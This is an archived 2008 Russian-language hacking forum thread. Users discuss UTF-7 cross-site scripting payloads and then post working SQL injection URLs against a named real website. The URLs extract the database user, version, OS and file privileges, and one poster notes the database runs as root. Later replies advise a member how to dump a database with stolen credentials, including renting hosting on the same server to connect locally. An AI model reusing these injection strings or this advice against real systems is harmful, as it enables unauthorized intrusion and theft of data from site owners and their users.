ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
03.07.2008, 13:56
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
чтобы код выполнялся, нужно поместить МЕТА-тег
Помню даж на старом античате статья была...
кстати вот она:
http://old.antichat.ru/txt/utf7/
прочти и всё поймёшь
|
|
|
03.07.2008, 14:04
|
|
Постоянный
Регистрация: 30.12.2006
Сообщений: 434
Провел на форуме:
849583
Репутация:
210
|
|
чтобы код выполнялся, нужно поместить МЕТА-тег
Помню даж на старом античате статья была...
кстати вот она:
http://old.antichat.ru/txt/utf7/
прочти и всё поймёшь
Ты бы сам-то прочитал бы эту статью!
Следует отметить, что распознавание кодировки, парсинг HTML тегов, и выполнение встретившихся скриптов происходит одновременно. Таким образом, если кодировка еще не определена, и встречается скрипт, зашифрованный в некоторой кодировке, например UTF-7, то браузер считает, что кодировка документа UTF-7, расшифровывает и выполняет скрипт, и только затем парсит оставшуюся часть документа. При этом, даже если впоследствии окажется, что кодировка иная (например встретился метатег с явным указанием кодировки, или были обнаружены русские буквы), скрипт все равно выполнится
Где там в примерах помещается МЕТА-тег???
Там просто закрываеться </title> - под видом +ADw-/title+AD4 и вставляеться javascript код
Но вопросы:
1) Но я и на локалхосте пробую без фильтрации например так
Цитата:
<html>
<head></head>
<body>
+ADwA-script+AD4A-alert('hacked+ACEA-')+ADwA-/script+AD4A-
</body>
</html>
Алерта нет...
Я смотрел заголовки - никакой передачи значения кодировки в HTTP Content-Type
Как именно нужно указать что текст в кодировке UTF-7?
Переводил редактором AnyCode, а дальше просто скопировать полученный текст?
Или ИЕ уже по другому обрабатыает кодировки?
2) Есль ли такие же способы, но с другими кодировками
напр UTF-16 ?
Последний раз редактировалось Naydav; 03.07.2008 в 14:17..
|
|
|
|
03.07.2008, 15:32
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
упс)) давно уже её читал, толком не помню, но суть прежняя : без мета тега не прокатит.
наверное только в старой ИЕшке.
|
|
|
|
03.07.2008, 16:05
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
и у меня возник вопрос, по скулям:
есть скуля, но выводятся только цифры, а текст не ввыводится. Что делать?
как пример, сайт русских шлюх:
http://putana.nu/list.php?link=-1+union+select+user(),2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42,43/*
|
|
|
|
03.07.2008, 16:09
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
2 o3,14um
нужны текстовые поля, всё выводится:
http://putana.nu/list.php?link=-1+union+select+1,user(),version(),4,5,6,7,8,9,10,1 1,12,13,%2014,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30%20,31,32,33,34,35,36,37,38,39,40,41,42 ,43/*
PS кстати root  |
|
|
|
03.07.2008, 16:42
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
Скуля вообще может претендовать на звание идеальной, не смотря на 4.0 ветку.
File_priv = Y, к тому же еще и ось фряшная, значит можно диры просматривать.. развлечение да и только
Код:
cmd> POST /list.php?link=-1+union+select+1,@@version_compile_os,file_priv,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+mysql.user/* HTTP/1.0
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
03.07.2008, 20:26
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Имею на руках логин, базу данных, пароль от базы данных.
Можно ли подсоединиться telnet'om или с помощью ssh к открытому порту 3306 и слить оттуда базу данных?
|
|
|
|
03.07.2008, 20:37
|
|
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
Провел на форуме:
5321514
Репутация:
3313
|
|
Сообщение от Ershik
Имею на руках логин, базу данных, пароль от базы данных.
Можно ли подсоединиться telnet'om или с помощью ssh к открытому порту 3306 и слить оттуда базу данных?
Да, а лучше найди на сайте phpmyadmin(если есть) или воспользуйся клиентом MySql
|
|
|
|
03.07.2008, 20:42
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
В том то и дело, что myadmin либо нет, либо спрятан так, что фиг найдешь. Искал его в течении недели.
Подключение к удаленному mysql запрещено. Я пытался так сделать.
Где можно почитать документацию по коннекту к порту, дампу базы данных и etc? В доках по телнету или ssh ?
|
|
|
|
03.07.2008, 22:01
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Сообщение от Ershik
В том то и дело, что myadmin либо нет, либо спрятан так, что фиг найдешь. Искал его в течении недели.
Подключение к удаленному mysql запрещено. Я пытался так сделать.
Можешь узнать что за хостинг, купить себе хостинг на этом же серваке и подключится к БД локально с логином и паролем от базы того хоста чью базу хочешь слить.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
Последний раз редактировалось Qwazar; 03.07.2008 в 22:13..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
